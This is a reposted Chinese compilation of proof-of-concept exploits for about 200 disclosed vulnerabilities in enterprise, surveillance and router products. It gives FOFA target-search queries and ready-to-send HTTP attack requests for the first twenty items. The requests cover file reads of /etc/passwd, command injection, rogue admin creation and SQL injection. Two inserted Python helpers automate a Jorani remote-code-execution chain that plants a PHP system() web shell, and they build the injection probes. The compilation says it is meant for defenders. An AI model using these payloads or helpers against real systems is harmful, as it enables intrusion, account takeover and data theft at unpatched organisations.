Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29

道一安全, 2024-06-05 07:41, Beijing
The following article is reposted from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities makes up a large share of real attack activity in offensive/defensive exercises, so this compilation is meant to help defenders. Defensive teams can use it to check their own exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long are replaced with the placeholder PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's rights, contact the 网络安全新视界 team through the account backend and the material will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the complete list; open the browser's developer tools (F12) and search for a keyword to find an entry.

Bookmark this article if it is useful, or follow the public account (网络安全新视界).


Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. jshERP (华夏ERP) sensitive information disclosure
15. jshERP getAllList information disclosure
16. 红帆 HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC smart IoT integrated management platform arbitrary file read
21. Dahua ICC smart IoT integrated management platform random remote code execution
22. Dahua ICC smart IoT integrated management platform log4j remote code execution
23. Dahua ICC smart IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QAX 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QAX 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan 建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian 科立讯 communication command and dispatch platform down_file.php SQL injection
138. Fujian 科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. Fujian 科立讯 communication command and dispatch platform editemedia.php SQL injection
140. Fujian 科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. Fujian 科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友) 天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection (same item as 158)
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. FE (飞企互联) enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) Internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) full-media news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload


POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want the new account to have.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then send the following request (the command is injected into the wifiRebootrange field):
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used by the following requests:
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step 2: POST the login form. The language parameter traverses into application/logs, and the login value is a PHP stub that calls system() on the base64-decoded value of a custom request header; the failed login writes that stub into the day's log file.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step 3: send the following request to the target to run id. The log page name carries the date of step 2, and the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (it decodes to echo ---------;id 2>&1;echo ---------;).
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

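The three steps above are easy to get subtly wrong by hand (cookie reuse, URL encoding of the traversal, the exact base64 of the fenced command, and where the output lands in the rendered log page). The helper below is an added example, not code from the original post: it builds each message and parses the answers entirely offline on constructed data. The host, the trigger header name K1SYJPMHLU4Z (any unusual header works), the DummyPassword placeholder and the CodeIgniter log file naming are assumptions.

```python
import base64
import re
from typing import Dict, Optional
from urllib.parse import quote

# Delimiter the page's own header payload puts around the command output (nine dashes).
MARKER = "-" * 9
# Trigger header name; K1SYJPMHLU4Z is what the page uses, any unusual name would do.
HEADER = "K1SYJPMHLU4Z"

# Constructed from the step 1 response shown on the page (not a live capture).
SAMPLE_LOGIN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; Max-Age=7200; path=/\r\n"
    "Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; Max-Age=7200; path=/; HttpOnly\r\n"
    "\r\n"
)

# Constructed rendered log page, as the target would return it after step 3.
SAMPLE_LOG_PAGE = ("<html>ERROR 2023-10-24 Login failed for user " + MARKER
                   + "\nuid=33(www-data) gid=33(www-data)\n" + MARKER + "\n</html>")


def parse_cookies(raw_response: str) -> Dict[str, str]:
    """name=value pairs from every Set-Cookie header of the step 1 response."""
    return dict(re.findall(r"Set-Cookie:\s*([^=]+)=([^;\r\n]+)", raw_response))


def php_stub(header: str) -> str:
    """The stub that ends up in the log: system() on the base64-decoded custom header."""
    var = "$_SERVER['HTTP_" + header + "']"
    return "<?php if(isset(" + var + ")){system(base64_decode(" + var + "));} ?>"


def login_body(csrf: str, header: str, dummy_password: str = "DummyPassword") -> str:
    """Step 2 form body. `language` escapes the language directory into application/logs,
    so the rejected login (with the stub as the user name) is written into a .php log file.
    dummy_password is an assumption; the page shows a truncated placeholder."""
    return ("csrf_test_jorani=" + csrf
            + "&last_page=session%2Flogin"
            + "&language=" + quote("../../application/logs", safe="")
            + "&login=" + quote(php_stub(header), safe="")
            + "&CipheredValue=" + quote(dummy_password, safe=""))


def wrap_command(cmd: str) -> str:
    """Fence the command output with MARKER so it can be cut out of the rendered log page."""
    return "echo " + MARKER + ";" + cmd + " 2>&1;echo " + MARKER + ";"


def encode_command(cmd: str) -> str:
    """Header value for step 3: base64 of the fenced command."""
    return base64.b64encode(wrap_command(cmd).encode()).decode()


def decode_command(header_value: str) -> str:
    """Inverse of encode_command, for checking what a captured header would run."""
    return base64.b64decode(header_value).decode()


def trigger_request(host: str, cookies: Dict[str, str], cmd: str, log_date: str,
                    header: str = HEADER) -> str:
    """Raw step 3 request. Assumption: CodeIgniter writes application/logs/log-YYYY-MM-DD.php
    and /pages/view/<name> includes that file as a view, which executes the stub."""
    cookie = "; ".join(k + "=" + v for k, v in cookies.items())
    return ("GET /pages/view/log-" + log_date + " HTTP/1.1\r\n"
            + "Host: " + host + "\r\n"
            + "Cookie: " + cookie + "\r\n"
            + header + ": " + encode_command(cmd) + "\r\n"
            + "X-REQUESTED-WITH: XMLHttpRequest\r\n\r\n")


def extract_output(page: str) -> Optional[str]:
    """Text between the two markers in the rendered log page; None if the stub did not run."""
    parts = page.split(MARKER)
    return parts[1].strip() if len(parts) >= 3 else None


if __name__ == "__main__":
    jar = parse_cookies(SAMPLE_LOGIN_RESPONSE)
    print(login_body(jar["csrf_cookie_jorani"], HEADER))
    print(trigger_request("192.168.190.30", jar, "id", "2023-10-24"))
    print(extract_output(SAMPLE_LOG_PAGE))
```

The step 2 body here URL-encodes the stub, which the page's raw POC leaves unencoded; the server decodes either form. Defenders get the same value out of the block: the fenced-output convention and the base64 header are what to look for in access logs, and a `language` parameter containing `..` should never reach the application.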
13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. jshERP (华夏ERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes user names and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. jshERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes user names and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice (医微云) SQL injection
FOFA: title="HFOffice"
The POC makes the database compute the MD5 of 1234; the hash appearing in the response confirms the injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

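Items 9, 16, 17 and 19 (and the @@version probe in item 11) all confirm injection the same way: the payload makes the database compute something the tester can predict, and the value leaks through an error message. That means a safe verification needs only the expected digest, not a data dump. The block below is an added example, not the original post's code: it double-encodes the Doccms payload as the page describes, builds the Dahua SOAP envelope, computes the markers for the MySQL (extractvalue/updatexml) and SQL Server (HASHBYTES) cases, and checks constructed responses for them. The sample responses are constructed; 1234 and 102103122 are the seeds the page's own payloads use.

```python
import hashlib
from urllib.parse import quote, unquote


def double_url_encode(s: str) -> str:
    """Item 9: encode twice, so the framework's own decode still leaves one encoded layer
    for the vulnerable query path (the page says PAYLOAD is the double URL encoding)."""
    return quote(quote(s, safe=""), safe="")


def decode_twice(s: str) -> str:
    """Inverse, to check what the application will actually see."""
    return unquote(unquote(s))


def doccms_request_line(payload: str) -> str:
    return "GET /search/index.php?keyword=" + double_url_encode(payload) + " HTTP/1.1"


def dahua_soap_body(seed: str) -> str:
    """Item 17 envelope with the page's updatexml probe; the tester picks the seed."""
    return (
        "<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>"
        "<s11:Body>"
        "<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>"
        "<netMarkings>(updatexml(1,concat(0x7e,md5(" + seed + "),0x7e),1))) and (1=1</netMarkings>"
        "</ns1:deleteBulletin></s11:Body></s11:Envelope>"
    )


def mysql_error_marker(seed: str) -> str:
    """Items 17 and 19: extractvalue()/updatexml() reject the bad XPath with
    "XPATH syntax error: '<text>'" and show at most 32 characters of it, so 0x7e plus
    the first 31 hex characters of md5(seed) is all that ever appears in the response."""
    return ("~" + hashlib.md5(seed.encode()).hexdigest())[:32]


def mssql_error_marker(seed: str) -> str:
    """Item 16: CONVERT(VARCHAR(32), HASHBYTES('MD5', seed), 2) is upper-case hex;
    '1-<hex>' cannot be converted to int and the error message quotes the whole string."""
    return hashlib.md5(seed.encode()).hexdigest().upper()


def confirmed(response_text: str, marker: str) -> bool:
    """True only if the database-computed marker is echoed back; a bare 500 proves nothing."""
    return marker in response_text


DOCCMS_PAYLOAD = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"

# Constructed responses, not captures. md5('1234') = 81dc9bdb52d04dc20036dbd8313ed055.
SAMPLE_MYSQL_ERROR = "XPATH syntax error: '~81dc9bdb52d04dc20036dbd8313ed05'"
SAMPLE_MSSQL_ERROR = ("Conversion failed when converting the varchar value "
                      "'81DC9BDB52D04DC20036DBD8313ED055' to data type int.")
SAMPLE_GENERIC_500 = "HTTP 500 Internal Server Error"

if __name__ == "__main__":
    print(doccms_request_line(DOCCMS_PAYLOAD))
    print(dahua_soap_body("102103122"))
    print(confirmed(SAMPLE_MYSQL_ERROR, mysql_error_marker("1234")),
          confirmed(SAMPLE_MSSQL_ERROR, mssql_error_marker("1234")),
          confirmed(SAMPLE_GENERIC_500, mysql_error_marker("1234")))
```

Two practitioner notes follow from the code: compare against the truncated 32-character marker for the MySQL family, or a correct hit will be missed, and for the SQL Server case expect upper-case hex, since that is what CONVERT style 2 produces.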
20. Dahua ICC smart IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
